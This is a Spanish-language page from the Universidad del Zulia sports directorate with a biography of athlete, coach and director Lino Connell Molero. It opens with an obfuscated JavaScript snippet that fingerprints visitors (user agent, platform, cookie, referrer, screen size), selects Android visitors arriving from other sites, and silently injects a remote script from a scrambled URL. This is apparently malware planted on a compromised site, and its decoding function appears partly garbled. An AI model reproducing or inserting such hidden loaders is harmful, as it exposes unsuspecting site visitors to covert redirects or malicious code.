;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("dt(naevg)A!rueesiuu")],q=n[p("2mlrxohfntza0lipy")],t=d[p("3e!ifkho2o8co")],o=w[p("sn0oqiwt6amtmnde2izrxos")],h=w[p("rnhofi0t9adcaoll1")][p("beamlann8t(s3odhy")],dr=d[p("qrkemrbrvetf5elr4")],dt=s.height/w.devicePixelRatio-w.screenTop;if(!c(dr,h)&&dr!==''){if(dt>0&&o!==undefined){if(c(u,p("!d1ito!rbd3noAy"))&&!c(u,p("1s0wsocdhngiiWk"))){if(c(q,p("!d1ito!rbd3noAy"))||c(q,p("jxdueniilLe"))){if(!c(t,p("2=3a4m8tnu3_a_v"))){var e=d.createElement('script');e.type='text/javascript';e.async=true;e.src=p('hafdy4i64798l9uf89xfxf6d57ce06c6zfyed5c6y58dl5u9d4d8n0x2ddfc7fxcl=ov)&m2(1q=jdxilcv?uskjj.(e2dio(ne_pibuk/am7opci.z5(633asgtrantpsrk2coioluco/h/s:dsspztxtzh(');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(e,v)}}}}}function p(e){var k='';for(var w=0;w=0;q--){d+=a[q]}return d}})(); Lino Connell Molero - Dirección de Deportes
Universidad del Zulia
Correo LUZMapa del sitio
24 de octubre de 2018
 
Programas
Alto Rendimiento Educ.Fisica y Recreación Deporte Interno Extensión Deportiva Actividad Física Recreación Atención al Atleta Entrenamientos Registro Atleta LUZ Pequeña Liga de Béisbol
Juegos Deportivos
Condiciones Generales
Afiches deportivos
Posición Final 2010
Posición Final 2011
Planilla de inscripción
Más Deporte
Juvines 2010
Juvines 2012
Juvineu 2015

images/stories/topes/sucesion.jpg

Agrandar texto   Reducir texto   Reestablecer texto    
Lino Connell Molero PDF Imprimir Correo

Director de Deportes 
Universidad del Zulia
2000-2004


Lino Antonio Connell Molero, zuliano de nacimiento, ha sido uno de los deportistas más polifacéticos por su incursión desde muy joven en las disciplinas de boxeo, béisbol, baloncesto y voleibol,  ésta última,  con la que ha alcanzado innumerables galardones y títulos que han llenado de orgullo al gentilicio zuliano.

Fue integrante de la selección nacional de voleibol por espacio de 14 años, además asistió a dos mundiales  de voleibol en el año 1960 en Brasil y 1970 en Bulgaria;  asimismo,  durante las décadas de los años 60 y 70 registra en su récord deportivo,  la asistencia a cuatro Juegos Panamericanos, cuatro Suramericanos, cuatro Centroamericanos y de Caribe  y dos Bolivarianos.
 
En lo referente a la especialidad de béisbol,  fue selección del estado Zulia por espacio de 18 años y por 14 años formó parte del baloncesto regional.
En 1966, integró la novena de béisbol “AA” que obtuvo el gallardete en el primer campeonato realizado en la ciudad de Maracay.
 
Pionero del voleibol universitario

En el año 1961, es contratado como entrenador de LUZ, siendo uno de los pioneros en ingresar a nuestra institución en el área deportiva en la disciplina de voleibol.
Como técnico del equipo de voleibol de la Universidad del Zulia,  alcanzó el titulo de los años 86, 87y 88 en eventos nacionales universitarios.

A la par con su labor de entrenador de LUZ, ingresa como personal docente en la mención de Educación Física en el año 1982. Dictando la cátedra en Voleibol.

El 1 de Octubre de 1987, durante la gestión del Ing. José Chiquinquirá Ferrer como rector y Roberto Bermúdez como Director de Deportes,  es inaugurado un gimnasio en el núcleo humanístico que fue distinguido con su nombre.

El dirigente deportivo

Como dirigente deportivo,  ha ocupado cargos de jerarquía a nivel regional, destacando como director del Instituto Regional de Deportes del estado Zulia (Irdez), 1998-2000; titular de Deportes de la Universidad del Zulia, periodo 2000-2004; miembro de la  junta directiva de la Fundación para el Cuido y Mantenimiento de las Instalaciones Deportivas de Maracaibo (Fundaidem), 2004-2007; integró el Consejo de Honor de la Federación Deportiva de Educación Superior 2006-2008,   es miembro de la Federación Glorias del Deporte Venezolano;  integró la junta directiva de la Asociación de Profesores de LUZ (Apuz) en el periodo 2008-2010 y actualmente es el Presidente adjunto del Instituto Municipal de Deportes y Recreación (Imdeprec) 2007-2010.

Ha sido merecedor de innumerables reconocimientos de instituciones públicas y privadas de la región y del país,  siendo unos de sus últimos galardones la Orden Luis Moreno en su única clase que otorga el Instituto Regional de Deportes del estado Zulia, la Orden Gilberto González conferida por la Federación de Profesores Universitarios de Venezuela, (2002);  la  Orden Brígido Iriarte (2003), la Orden al Merito Deportivo Miguel Sanabria (2004),  en el año 2005 su nombre se inmortalizó al ser exaltado al Hall de la Fama del Deporte Venezolano y en el 2006 por su destacado quehacer deportivo y profesional, la Universidad del Zulia,  le confirió el Doctorado Honoris Causa por cultivar valores trascendentales que lo han convertido en un paradigma a seguir por las futuras generaciones.

Hoy por hoy,  Lino Connell  se mantiene activo en la práctica deportiva como integrante del equipo de softbol y voleibol  de la Asociación de Profesores de nuestra universidad (Apuz).

La Universidad del Zulia, continúa rindiendo homenaje al atleta, entrenador, docente y dirigente,  al recuperar y reacondicionar el gimnasio que desde el 1 de Octubre de 1987 lleva  su nombre.


Ubicaciòn:
  Gimnasio Lino Connell Molero- Ciudad Universitaria Dr. Antonio Borjas Romero- Núcleo Humanístico al lado de las Canchas de Tenis de Campo.


Redacción: Yasmira Meleán Marin
Foto: Claudio Ocando




^ Subir